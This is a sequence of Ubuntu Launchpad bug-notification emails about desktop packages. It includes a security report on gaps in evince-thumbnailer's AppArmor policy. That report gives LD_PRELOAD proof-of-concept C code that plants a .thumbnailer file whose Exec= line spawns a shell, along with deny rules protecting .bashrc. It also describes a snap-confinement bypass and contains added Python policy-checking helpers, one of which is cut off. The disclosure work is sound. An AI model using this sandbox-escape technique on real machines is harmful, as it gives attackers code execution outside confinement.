  Uname: Linux 4.15.0-041500rc6-generic x86_64
  ApportVersion: 2.20.9-0ubuntu7.6
  Architecture: amd64
  CurrentDesktop: GNOME
  Date: Thu Apr 25 16:15:43 2019
  InstallationDate: Installed on 2015-11-05 (1267 days ago)
  InstallationMedia: Ubuntu 14.04.3 LTS "Trusty Tahr" - Beta amd64 (20150805)
  SourcePackage: evince
  UpgradeStatus: Upgraded to bionic on 2018-05-24 (335 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/evince/+bug/1826415/+subscriptions
[Desktop-packages] [Bug 1788929] Re: Debian/Ubuntu AppArmor policy gaps in evince
Ubuntu 14.04 LTS is now out of standard support and evince is not included in ESM.

** Changed in: evince (Ubuntu Trusty)
   Status: In Progress => Won't Fix

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu.
https://bugs.launchpad.net/bugs/1788929

Title: Debian/Ubuntu AppArmor policy gaps in evince

Status in AppArmor: Fix Released
Status in apparmor package in Ubuntu: Fix Released
Status in evince package in Ubuntu: Fix Released
Status in apparmor source package in Trusty: Fix Released
Status in evince source package in Trusty: Won't Fix
Status in apparmor source package in Xenial: Fix Released
Status in evince source package in Xenial: In Progress
Status in apparmor source package in Bionic: Fix Released
Status in evince source package in Bionic: In Progress
Status in apparmor source package in Cosmic: Fix Released
Status in evince source package in Cosmic: Fix Released

Bug description:
  [Note on coordination: I'm reporting this as a security bug to both Ubuntu (because Ubuntu is where this policy originally comes from, and Ubuntu is also where AppArmor is most relevant) and Debian (because the AppArmor policy has been merged into Debian's version of the package). It isn't clear to me who really counts as upstream here...]

  Debian/Ubuntu ship with an AppArmor policy for evince, which, among other things, restricts evince-thumbnailer. The Ubuntu security team seems to incorrectly believe that this policy provides meaningful security isolation:

  https://twitter.com/alex_murray/status/1032780425834446849
  https://twitter.com/alex_murray/status/1032796879640190976

  This AppArmor policy seems to be designed to permit everything that evince-thumbnailer might need; however, it does not seem to be designed to establish a consistent security boundary around evince-thumbnailer.

  For example, read+write access to almost the entire home directory is granted:

  /usr/bin/evince-thumbnailer {
  [...]
    # Lenient, but remember we still have abstractions/private-files-strict in
    # effect).
    @{HOME}/ r,
    owner @{HOME}/** rw,
    owner /media/** rw,
  }

  As the comment notes, a couple files are excluded to prevent you from just overwriting well-known executable scripts in the user's home directory, like ~/.bashrc:

  [...]
    # don't allow reading/updating of run control files
    deny @{HOME}/.*rc mrk,
    audit deny @{HOME}/.*rc wl,

    # bash
    deny @{HOME}/.bash* mrk,
    audit deny @{HOME}/.bash* wl,
    deny @{HOME}/.inputrc mrk,
    audit deny @{HOME}/.inputrc wl,
  [...]

  Verification:

  user@ubuntu-18-04-vm:~$ cat preload2.c
  #define _GNU_SOURCE
  #include <errno.h>
  #include <fcntl.h>
  #include <stdio.h>
  #include <stdlib.h>

  __attribute__((constructor)) static void entry(void) {
    printf("constructor running from %s\n", program_invocation_name);
    int fd = open("/home/user/.bashrc", O_WRONLY);
    if (fd != -1) {
      printf("success\n");
    } else {
      perror("open .bashrc");
    }
    exit(0);
  }
  user@ubuntu-18-04-vm:~$ sudo gcc -shared -o /usr/lib/x86_64-linux-gnu/libevil_preload.so preload2.c -fPIC
  user@ubuntu-18-04-vm:~$ LD_PRELOAD=/usr/lib/x86_64-linux-gnu/libevil_preload.so evince-thumbnailer
  constructor running from evince-thumbnailer
  open .bashrc: Permission denied
  user@ubuntu-18-04-vm:~$ dmesg|tail -n1
  [ 6900.355399] audit: type=1400 audit(1535126396.280:113): apparmor="DENIED" operation="open" profile="/usr/bin/evince-thumbnailer" name="/home/user/.bashrc" pid=4807 comm="evince-thumbnai" requested_mask="w" denied_mask="w" fsuid=1000 ouid=1000

  But of course blacklists are brittle and often trivially bypassable. For example, did you know that it is possible to override the system's thumbnailers by dropping .thumbnailer files in ~/.local/share/ ? .thumbnailer files contain command lines that will be executed by nautilus.

  To demonstrate that it is possible to create .thumbnailer files from evince-thumbnailer:

  user@ubuntu-18-04-vm:~$ ls -la .local/share/thumbnailers/
  ls: cannot access '.local/share/thumbnailers/': No such file or directory
  user@ubuntu-18-04-vm:~$ cat preload3.c
  #define _GNU_SOURCE
  #include <err.h>
  #include <errno.h>
  #include <stdio.h>
  #include <sys/stat.h>
  #include <sys/types.h>

  __attribute__((constructor)) static void entry(void) {
    printf("constructor running from %s\n", program_invocation_name);
    if (mkdir("/home/user/.local/share/thumbnailers", 0777) && errno != EEXIST)
      err(1, "mkdir");
    FILE *f = fopen("/home/user/.local/share/thumbnailers/evil.thumbnailer", "w");
    if (!f)
      err(1, "create");
    fputs("[Thumbnailer Entry]\n", f);
    fputs("Exec=find /etc/passwd -name passwd -exec gnome-terminal -- sh -c id;cat
  [...]
  }

  As a comment in abstractions/dbus-session explains:

    # This abstraction grants full session bus access.
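The report's point that a deny-list on top of a broad `owner @{HOME}/** rw` grant leaves every unlisted path writable can be checked mechanically. The following is an added example, not part of the report and not AppArmor's own matcher: a simplified evaluator that reads the two policy excerpts quoted above and answers whether a path is writable. Assumptions: @{HOME} is bound to /home/user, the owner qualifier is ignored, only the `*`, `**` and `?` globs are handled, and ALLOWLIST_VARIANT is a constructed contrast, not the fix that shipped.

```python
import re

# Rules copied from the two excerpts quoted in the report.
SHIPPED_EXCERPT = """
  # Lenient, but remember we still have abstractions/private-files-strict in effect
  @{HOME}/ r,
  owner @{HOME}/** rw,
  owner /media/** rw,
  # don't allow reading/updating of run control files
  deny @{HOME}/.*rc mrk,
  audit deny @{HOME}/.*rc wl,
  deny @{HOME}/.bash* mrk,
  audit deny @{HOME}/.bash* wl,
  deny @{HOME}/.inputrc mrk,
  audit deny @{HOME}/.inputrc wl,
"""

# Constructed for contrast (not the shipped fix): home is read-only and the
# only writable path is the temporary output file named in bug 1798091.
ALLOWLIST_VARIANT = """
  @{HOME}/ r,
  owner @{HOME}/** r,
  owner /media/** r,
  owner /tmp/gnome-desktop-thumbnailer.png w,
"""

QUALIFIERS = {"audit", "deny", "owner", "allow"}


def glob_to_regex(glob):
    """Translate the AppArmor globs used here: ** crosses '/', * and ? do not."""
    out, i = [], 0
    while i < len(glob):
        if glob.startswith("**", i):
            out.append(".*")
            i += 2
        elif glob[i] == "*":
            out.append("[^/]*")
            i += 1
        elif glob[i] == "?":
            out.append("[^/]")
            i += 1
        else:
            out.append(re.escape(glob[i]))
            i += 1
    return re.compile("".join(out))


def parse_rules(profile_text, home="/home/user"):
    """Parse simple file rules; anything else (includes, dbus, ...) is skipped."""
    rules = []
    for raw in profile_text.splitlines():
        line = raw.split("#", 1)[0].strip().rstrip(",").strip()
        if not line:
            continue
        tokens = line.split()
        quals = set()
        while tokens and tokens[0] in QUALIFIERS:
            quals.add(tokens.pop(0))
        if len(tokens) != 2 or not tokens[0].startswith(("/", "@{")):
            continue
        path, perms = tokens
        rules.append({
            "deny": "deny" in quals,
            "regex": glob_to_regex(path.replace("@{HOME}", home)),
            "perms": set(perms),
            "text": line,
        })
    return rules


def decide(rules, path, perm):
    """Return (decision, rule). Deny rules win; no matching rule means deny."""
    for rule in rules:
        if rule["deny"] and perm in rule["perms"] and rule["regex"].fullmatch(path):
            return ("deny", rule["text"])
    for rule in rules:
        if not rule["deny"] and perm in rule["perms"] and rule["regex"].fullmatch(path):
            return ("allow", rule["text"])
    return ("deny", "no matching rule")


if __name__ == "__main__":
    # Both paths are the ones exercised in the report.
    paths = ["/home/user/.bashrc",
             "/home/user/.local/share/thumbnailers/evil.thumbnailer"]
    for label, text in (("shipped", SHIPPED_EXCERPT), ("allow-list", ALLOWLIST_VARIANT)):
        rules = parse_rules(text)
        for p in paths:
            print(label, p, decide(rules, p, "w"))
```
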
[Desktop-packages] [Bug 1831368] [NEW] Deja-dup asks to install software from un-trusted sources
Public bug reported:

When setting up deja-dup to backup to Google drive, it says that duplicity & python-gi are not installed (this is expected). It gives the option to install these packages, but the system warns that they are from an untrusted source. Installing the same packages from terminal raises no such warnings.

ProblemType: Bug
DistroRelease: Ubuntu 18.04
Package: deja-dup 37.1-2fakesync1ubuntu0.1
ProcVersionSignature: Ubuntu 4.18.0-20.21~18.04.1-generic 4.18.20
Uname: Linux 4.18.0-20-generic x86_64
ApportVersion: 2.20.9-0ubuntu7.6
Architecture: amd64
CurrentDesktop: ubuntu:GNOME
Date: Sun Jun 2 12:28:52 2019
InstallationDate: Installed on 2019-05-28 (4 days ago)
InstallationMedia: Ubuntu 18.04.2 LTS "Bionic Beaver" - Release amd64 (20190210)
ProcEnviron:
 LANGUAGE=en_GB:en
 PATH=(custom, no user)
 XDG_RUNTIME_DIR=
 LANG=en_GB.UTF-8
 SHELL=/bin/bash
SourcePackage: deja-dup
UpgradeStatus: No upgrade log present (probably fresh install)

** Affects: deja-dup (Ubuntu)
   Importance: Undecided
   Status: New

** Tags: amd64 apport-bug bionic

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to deja-dup in Ubuntu.
https://bugs.launchpad.net/bugs/1831368

Title: Deja-dup asks to install software from un-trusted sources

Status in deja-dup package in Ubuntu: New

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/deja-dup/+bug/1831368/+subscriptions
[Desktop-packages] [Bug 1798091] Re: thumbnailer cannot create tempfiles (with apparmor denials)
@Christina - I suggest filing a new bug with more specifics. That said, I suspect you have a .dpkg-dist file in /etc/apparmor.d or /etc/apparmor.d/abstractions that has changes that need to be merged into your evince profile.

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu.
https://bugs.launchpad.net/bugs/1798091

Title: thumbnailer cannot create tempfiles (with apparmor denials)

Status in evince package in Ubuntu: Fix Released
Status in evince source package in Cosmic: Fix Released
Status in evince source package in Disco: Fix Released
Status in evince package in Debian: Fix Released

Bug description:
  * Impact
  Nautilus fails to generate previews for pdf files

  * Test case
  Download/copy a pdf, open the directory in nautilus, a preview image should be displayed

  * Regression potential
  Check that there are no other apparmor denials and the thumbnailer works

  While trying to create thumbnails in a directory from within nautilus, I got:

  [781429.784125] audit: type=1400 audit(1539694722.247:989): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30937 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000
  [781429.940592] audit: type=1400 audit(1539694722.403:990): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30941 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000
  [781430.314591] audit: type=1400 audit(1539694722.779:991): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30945 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000
  [781431.283522] audit: type=1400 audit(1539694723.747:992): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30949 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000
  [781431.518566] audit: type=1400 audit(1539694723.983:993): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30953 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000

  ProblemType: Bug
  DistroRelease: Ubuntu 18.10
  Package: evince 3.30.1-1
  ProcVersionSignature: Ubuntu 4.18.0-8.9-generic 4.18.7
  Uname: Linux 4.18.0-8-generic x86_64
  ApportVersion: 2.20.10-0ubuntu13
  Architecture: amd64
  CurrentDesktop: ubuntu:GNOME
  Date: Tue Oct 16 14:59:00 2018
  InstallationDate: Installed on 2014-06-19 (1580 days ago)
  InstallationMedia: Ubuntu 14.04 LTS "Trusty Tahr" - Release amd64 (20140417)
  ProcEnviron:
   TERM=xterm-256color
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=de_DE.UTF-8
   SHELL=/bin/bash
  SourcePackage: evince
  UpgradeStatus: Upgraded to cosmic on 2018-10-07 (9 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/evince/+bug/1798091/+subscriptions
[Desktop-packages] [Bug 1724793] Re: Error localization
** Package changed: ufw (Ubuntu) => language-selector (Ubuntu)

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to language-selector in Ubuntu.
https://bugs.launchpad.net/bugs/1724793

Title: Error localization

Status in language-selector package in Ubuntu: New

Bug description:
  After some manipulation of the system interface of the OS was in English, as all the default startup application. I tried to change the locale via GUI, however, everything on the ground.
  ---
  After some manipulations with the system, the OS interface switched to English, as did all the applications started by default. I tried changing the locale through the GUI, but everything there is set as it should be.

  locale
  LANG=ru_RU.UTF-8
  LANGUAGE=C.UTF-8
  LC_CTYPE="ru_RU.UTF-8"
  LC_NUMERIC="ru_RU.UTF-8"
  LC_TIME="ru_RU.UTF-8"
  LC_COLLATE="ru_RU.UTF-8"
  LC_MONETARY="ru_RU.UTF-8"
  LC_MESSAGES="ru_RU.UTF-8"
  LC_PAPER="ru_RU.UTF-8"
  LC_NAME="ru_RU.UTF-8"
  LC_ADDRESS="ru_RU.UTF-8"
  LC_TELEPHONE="ru_RU.UTF-8"
  LC_MEASUREMENT="ru_RU.UTF-8"
  LC_IDENTIFICATION="ru_RU.UTF-8"
  LC_ALL=ru_RU.UTF-8

  locale -a
  C C.UTF-8 en_AG en_AG.utf8 en_AU.utf8 en_BW.utf8 en_CA.utf8 en_DK.utf8 en_GB.utf8 en_HK.utf8 en_IE.utf8 en_IN en_IN.utf8 en_NG en_NG.utf8 en_NZ.utf8 en_PH.utf8 en_SG.utf8 en_US.utf8 en_ZA.utf8 en_ZM en_ZM.utf8 en_ZW.utf8 POSIX ru_RU.utf8 ru_UA.utf8

  cat /etc/default/locale
  # File generated by update-locale
  LANG="ru_RU.UTF-8"
  LANGUAGE="ru:en"
  LC_NUMERIC="ru_RU.UTF-8"
  LC_TIME="ru_RU.UTF-8"
  LC_MONETARY="ru_RU.UTF-8"
  LC_PAPER="ru_RU.UTF-8"
  LC_IDENTIFICATION="ru_RU.UTF-8"
  LC_NAME="ru_RU.UTF-8"
  LC_ADDRESS="ru_RU.UTF-8"
  LC_TELEPHONE="ru_RU.UTF-8"
  LC_MEASUREMENT="ru_RU.UTF-8"

  nano ~/.bashrc
  # ~/.bashrc: executed by bash(1) for non-login shells.
  # see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
  # for examples
  #export LC_xxx=C.UTF-8
  export LC_ALL=ru_RU.UTF-8
  ...

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/language-selector/+bug/1724793/+subscriptions
[Desktop-packages] [Bug 1792835] Re: Bash completion for Inkscape does not work
The ufw bug is being tracked in bug 1775043. Removing that task.

** No longer affects: ufw (Ubuntu)

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to jackd2 in Ubuntu.
https://bugs.launchpad.net/bugs/1792835

Title: Bash completion for Inkscape does not work

Status in apt-xapian-index package in Ubuntu: New
Status in cowdancer package in Ubuntu: Fix Committed
Status in dpatch package in Ubuntu: New
Status in inkscape package in Ubuntu: Fix Released
Status in jackd2 package in Ubuntu: New

Bug description:
  Bash completion for Inkscape does not work in Ubuntu 18.04. It will for example suggest non-svg files.

  The reason seems to be that /usr/share/bash-completion/completions/inkscape uses the have() function, which is temporarily defined in /usr/share/bash-completion/bash_completion, but then unset at the end of that file.

  Workaround: Copy /usr/share/bash-completion/completions/inkscape to ~/.local/share/bash-completion/completions/inkscape and remove the uses of "have".

  The bash completion for some other commands seems to use have() too, e.g. jackd, ufw, cowbuilder, dpatch_edit_patch, and axi-cache, so bash completion for these commands will presumably not work either.

  From /usr/share/bash-completion/bash_completion:

  # Backwards compatibility for compat completions that use have().
  # @deprecated should no longer be used; generally not needed with dynamically
  # loaded completions, and _have is suitable for runtime use.
  have()
  {
      unset -v have
      _have $1 && have=yes
  }
  [...]
  unset -f have
  unset have

  From /usr/share/bash-completion/completions/inkscape:

  [...]
  have inkscape &&
  _inkscape()
  {
  [...]
  }
  [ "${have:-}" ] && complete -F _inkscape $filenames inkscape

  System information:

  $ lsb_release -rd
  Description: Ubuntu 18.04.1 LTS
  Release: 18.04

  $ apt-cache policy inkscape
  inkscape:
    Installed: 0.92.3-1
    Candidate: 0.92.3-1
    Version table:
   *** 0.92.3-1 500
          500 http://no.archive.ubuntu.com/ubuntu bionic/universe amd64 Packages
          100 /var/lib/dpkg/status

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apt-xapian-index/+bug/1792835/+subscriptions
[Desktop-packages] [Bug 1808264] Re: caldav free-busy query is broken
Whoops, misinterpreted the version numbering scheme and accidentally submitted a patch numbered for 18.04.2!

** Patch added: "Patch with correct version number"
   https://bugs.launchpad.net/ubuntu/+source/evolution-data-server/+bug/1808264/+attachment/5221828/+files/2-3.28.5-0ubuntu1.18.04.1.debdiff

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to evolution-data-server in Ubuntu.
https://bugs.launchpad.net/bugs/1808264

Title: caldav free-busy query is broken

Status in evolution-data-server package in Ubuntu: New

Bug description:
  A couple of bugs are present which make CalDAV scheduling effectively useless - the combined effect of them is that everyone else shows as having your availability information, rather than their own.

  I have patched the bugs upstream, and they have been merged into the branches for both 3.30.4 and 3.31.4:
  * https://gitlab.gnome.org/GNOME/evolution-data-server/merge_requests/8
  * https://gitlab.gnome.org/GNOME/evolution-data-server/merge_requests/7

  I'm hoping to backport these patches to bionic, which packages 3.28 -- I will submit such a debdiff later today. I am submitting here rather than to Debian as the versions of this package in Debian are out of lockstep with Ubuntu's, so the patch doesn't cleanly transfer -- let me know if this is the wrong approach. Cosmic is on the 3.30 release series, which I assume means the fix will come from upstream and doesn't need to be applied here, but let me know if I should do a patch for that as well.

  Thanks :)

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: evolution-data-server 3.28.5-0ubuntu0.18.04.1
  ProcVersionSignature: Ubuntu 4.15.0-42.45-generic 4.15.18
  Uname: Linux 4.15.0-42-generic x86_64
  ApportVersion: 2.20.9-0ubuntu7.5
  Architecture: amd64
  CurrentDesktop: ubuntu:GNOME
  Date: Wed Dec 12 22:05:38 2018
  InstallationDate: Installed on 2018-12-10 (1 days ago)
  InstallationMedia: Ubuntu 18.04.1 LTS "Bionic Beaver" - Release amd64 (20180725)
  SourcePackage: evolution-data-server
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/evolution-data-server/+bug/1808264/+subscriptions
[Desktop-packages] [Bug 1808264] Re: caldav free-busy query is broken
I have added a patch which applies both upstream merge requests linked above. I was not able to successfully set up pbuilder, but built and tested it successfully with debuild in a bionic VM. Subscribing ubuntu-sru in accordance with http://packaging.ubuntu.com/html/security-and-stable-release-updates.html as I'm pretty sure the change I'm requesting would be a stable release update.

Aiming to justify that update: this is a significant regression because somewhere between Xenial and Bionic, this caldav freebusy code was rewritten and broken. Additionally somewhere in that timeframe the behavior changed from using the address book's FBURL to using this caldav-based technique (which, again, doesn't work :)

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to evolution-data-server in Ubuntu.
https://bugs.launchpad.net/bugs/1808264

Title: caldav free-busy query is broken

Status in evolution-data-server package in Ubuntu: New

Bug description:
  A couple of bugs are present which make CalDAV scheduling effectively useless - the combined effect of them is that everyone else shows as having your availability information, rather than their own.

  I have patched the bugs upstream, and they have been merged into the branches for both 3.30.4 and 3.31.4:
  * https://gitlab.gnome.org/GNOME/evolution-data-server/merge_requests/8
  * https://gitlab.gnome.org/GNOME/evolution-data-server/merge_requests/7

  I'm hoping to backport these patches to bionic, which packages 3.28 -- I will submit such a debdiff later today. I am submitting here rather than to Debian as the versions of this package in Debian are out of lockstep with Ubuntu's, so the patch doesn't cleanly transfer -- let me know if this is the wrong approach. Cosmic is on the 3.30 release series, which I assume means the fix will come from upstream and doesn't need to be applied here, but let me know if I should do a patch for that as well.

  Thanks :)

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: evolution-data-server 3.28.5-0ubuntu0.18.04.1
  ProcVersionSignature: Ubuntu 4.15.0-42.45-generic 4.15.18
  Uname: Linux 4.15.0-42-generic x86_64
  ApportVersion: 2.20.9-0ubuntu7.5
  Architecture: amd64
  CurrentDesktop: ubuntu:GNOME
  Date: Wed Dec 12 22:05:38 2018
  InstallationDate: Installed on 2018-12-10 (1 days ago)
  InstallationMedia: Ubuntu 18.04.1 LTS "Bionic Beaver" - Release amd64 (20180725)
  SourcePackage: evolution-data-server
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/evolution-data-server/+bug/1808264/+subscriptions
[Desktop-packages] [Bug 1808264] Re: caldav free-busy query is broken
** Patch added: "Patch for this issue"
   https://bugs.launchpad.net/ubuntu/+source/evolution-data-server/+bug/1808264/+attachment/5221827/+files/1-3.28.5-0ubuntu0.18.04.2.debdiff

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to evolution-data-server in Ubuntu.
https://bugs.launchpad.net/bugs/1808264

Title: caldav free-busy query is broken

Status in evolution-data-server package in Ubuntu: New

Bug description:
  A couple of bugs are present which make CalDAV scheduling effectively useless - the combined effect of them is that everyone else shows as having your availability information, rather than their own.

  I have patched the bugs upstream, and they have been merged into the branches for both 3.30.4 and 3.31.4:
  * https://gitlab.gnome.org/GNOME/evolution-data-server/merge_requests/8
  * https://gitlab.gnome.org/GNOME/evolution-data-server/merge_requests/7

  I'm hoping to backport these patches to bionic, which packages 3.28 -- I will submit such a debdiff later today. I am submitting here rather than to Debian as the versions of this package in Debian are out of lockstep with Ubuntu's, so the patch doesn't cleanly transfer -- let me know if this is the wrong approach. Cosmic is on the 3.30 release series, which I assume means the fix will come from upstream and doesn't need to be applied here, but let me know if I should do a patch for that as well.

  Thanks :)

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: evolution-data-server 3.28.5-0ubuntu0.18.04.1
  ProcVersionSignature: Ubuntu 4.15.0-42.45-generic 4.15.18
  Uname: Linux 4.15.0-42-generic x86_64
  ApportVersion: 2.20.9-0ubuntu7.5
  Architecture: amd64
  CurrentDesktop: ubuntu:GNOME
  Date: Wed Dec 12 22:05:38 2018
  InstallationDate: Installed on 2018-12-10 (1 days ago)
  InstallationMedia: Ubuntu 18.04.1 LTS "Bionic Beaver" - Release amd64 (20180725)
  SourcePackage: evolution-data-server
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/evolution-data-server/+bug/1808264/+subscriptions
[Desktop-packages] [Bug 1808264] [NEW] caldav free-busy query is broken
Public bug reported:

A couple of bugs are present which make CalDAV scheduling effectively useless - the combined effect of them is that everyone else shows as having your availability information, rather than their own.

I have patched the bugs upstream, and they have been merged into the branches for both 3.30.4 and 3.31.4:
* https://gitlab.gnome.org/GNOME/evolution-data-server/merge_requests/8
* https://gitlab.gnome.org/GNOME/evolution-data-server/merge_requests/7

I'm hoping to backport these patches to bionic, which packages 3.28 -- I will submit such a debdiff later today. I am submitting here rather than to Debian as the versions of this package in Debian are out of lockstep with Ubuntu's, so the patch doesn't cleanly transfer -- let me know if this is the wrong approach. Cosmic is on the 3.30 release series, which I assume means the fix will come from upstream and doesn't need to be applied here, but let me know if I should do a patch for that as well.

Thanks :)

ProblemType: Bug
DistroRelease: Ubuntu 18.04
Package: evolution-data-server 3.28.5-0ubuntu0.18.04.1
ProcVersionSignature: Ubuntu 4.15.0-42.45-generic 4.15.18
Uname: Linux 4.15.0-42-generic x86_64
ApportVersion: 2.20.9-0ubuntu7.5
Architecture: amd64
CurrentDesktop: ubuntu:GNOME
Date: Wed Dec 12 22:05:38 2018
InstallationDate: Installed on 2018-12-10 (1 days ago)
InstallationMedia: Ubuntu 18.04.1 LTS "Bionic Beaver" - Release amd64 (20180725)
SourcePackage: evolution-data-server
UpgradeStatus: No upgrade log present (probably fresh install)

** Affects: evolution-data-server (Ubuntu)
   Importance: Undecided
   Status: New

** Tags: amd64 apport-bug bionic

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to evolution-data-server in Ubuntu.
https://bugs.launchpad.net/bugs/1808264

Title: caldav free-busy query is broken

Status in evolution-data-server package in Ubuntu: New

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/evolution-data-server/+bug/1808264/+subscriptions
[Desktop-packages] [Bug 1750069] Re: [MIR] xdg-desktop-portal-gtk
Marked the xenial and bionic tasks as incomplete. Seth gave some guidance but the desktop team needs to respond on how to handle it before anything is done with the seeding.

** Changed in: xdg-desktop-portal-gtk (Ubuntu Xenial)
       Status: New => Incomplete

** Changed in: xdg-desktop-portal-gtk (Ubuntu Bionic)
       Status: New => Incomplete

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to xdg-desktop-portal-gtk in Ubuntu.
https://bugs.launchpad.net/bugs/1750069

Title: [MIR] xdg-desktop-portal-gtk

Status in xdg-desktop-portal-gtk package in Ubuntu: Fix Released
Status in xdg-desktop-portal-gtk source package in Xenial: Incomplete
Status in xdg-desktop-portal-gtk source package in Bionic: Incomplete

Bug description:

Availability
Actively maintained in debian and we'll sync from debian again when 0.10 is available. Built for all supported architectures.

Rationale
Required for snaps.

Security
No known security issues, but due to the nature of this package, a security review is probably needed.
https://security-tracker.debian.org/tracker/source-package/xdg-desktop-portal-gtk
https://launchpad.net/xdg-desktop-portal-gtk/+cve

Quality assurance
- The Desktop Packages bug team is subscribed.
https://bugs.launchpad.net/ubuntu/+source/xdg-desktop-portal-gtk
https://bugs.debian.org/cgi-bin/pkgreport.cgi?src=xdg-desktop-portal-gtk
https://github.com/flatpak/xdg-desktop-portal-gtk/issues

Dependencies
No universe binary dependencies

Standards compliance
4.1.3 debhelper compat 10, dh 7 style simple rules

Maintenance
- Actively developed upstream. Last release was 0.10, this week.
https://github.com/flatpak/xdg-desktop-portal-gtk/commits/master
Well-maintained in Debian by Simon McVittie (Debian's Flatpak maintainer). Team-maintained.
https://salsa.debian.org/debian/xdg-desktop-portal-gtk

Background information
This is needed to make xdg-desktop-portal useful in Ubuntu Desktop.
See xdg-desktop-portal MIR bug LP: #1749672
[Desktop-packages] [Bug 1643910] Re: BAMF_DESKTOP_FILE_HINT not set in correct place for unity7
Actually, there is https://bugs.launchpad.net/bamf/+bug/1747802 which is fixed. I checked the code and this should be resolved. Marking as fixed.

** Changed in: bamf (Ubuntu)
       Status: Triaged => Fix Released

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to bamf in Ubuntu.
https://bugs.launchpad.net/bugs/1643910

Title: BAMF_DESKTOP_FILE_HINT not set in correct place for unity7

Status in Snappy: Triaged
Status in bamf package in Ubuntu: Fix Released

Bug description:

Occasionally when I pin items to the Unity7 launcher, the BAMF code (as I'm told) incorrectly matches to /snap/app/revision/

This is a security issue because the Exec= line points to /snap/app/revision/... which bypasses snap run (/snap/bin/...) and therefore snap-confine.

I'm told by Marcus (aka, 3v1n0 aka Trevinho) that this is because BAMF_DESKTOP_FILE_HINT is not exported by snap env and instead only injected in the desktop file that is created in /var/lib/snapd/desktop/applications upon snap install. This means that the wrong Exec= (ie, where it points to the binary) may occur in two places:

1. when launching /snap/bin/... from the command line
2. when something in /var/lib/snapd/desktop/applications/*.desktop doesn't match properly

In both cases, the initial launch is fine, but pinning the icon to the launcher results in the wrong entry in the Exec= line and launching from this pinned launcher entry after is unconfined.

You can check by doing:

1. launch application from the dash
2. run sudo aa-status and see if it is launched under confinement
3. pin the icon that is in the launcher
4. close the application, then launch from the pinned icon
5. run sudo aa-status and see if it is launched under confinement

This doesn't happen all the time. For example, vlc seems to work fine both from the command line and from launching via a pinned launcher entry. chrome-test on the other hand doesn't seem to work with either.

Related https://github.com/snapcore/snapd/pull/1580 -- puts BAMF_DESKTOP_FILE_HINT in the desktop file instead of in the environment, but Marco requested that this change (https://github.com/snapcore/snapd/pull/1580#issuecomment-234546220).

https://trello.com/c/xP1hN3BF/152-improve-desktop-file-support-by-adding-a-new-bamf-desktop-file-hint-environment-hint also discussed this issue, but the card is archived and therefore it won't be worked on.

I'm having trouble finding a simple reproducer (other than chrome-test) but am told by Marco that the BAMF matching will always work if BAMF_DESKTOP_FILE_HINT in the process' environment always points to the desktop file in /var/lib/snapd/desktop/applications. I will continue to look for a simple reproducer.
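The Exec= condition described in the report above can be checked mechanically. The following is an added example, not code from the bug report, BAMF or snapd: it flags desktop-entry Exec= lines that start a binary straight from /snap/<name>/<revision>/ instead of going through /snap/bin/. The sample desktop files, the snap name example-app and revision 42 are constructed.

```python
import re
import shlex

# /snap/<name>/<revision>/... is a path inside the mounted snap, while
# /snap/bin/<app> is the entry point that goes through "snap run" and
# therefore snap-confine.
DIRECT_SNAP_PATH = re.compile(r"^/snap/(?!bin/)[^/]+/[^/]+/")


def exec_command(exec_value):
    """Return the program an Exec= value starts, skipping an
    'env VAR=value ...' prefix such as the BAMF_DESKTOP_FILE_HINT one."""
    try:
        argv = shlex.split(exec_value)
    except ValueError:
        return None  # unbalanced quotes: nothing reliable to report
    if argv and argv[0] in ("env", "/usr/bin/env"):
        argv = argv[1:]
        while argv and re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", argv[0]):
            argv = argv[1:]
    return argv[0] if argv else None


def unconfined_exec_lines(desktop_text):
    """Return (group, command) for every Exec= entry that launches a binary
    directly from /snap/<name>/<revision>/ rather than /snap/bin/."""
    findings = []
    group = None
    for raw in desktop_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
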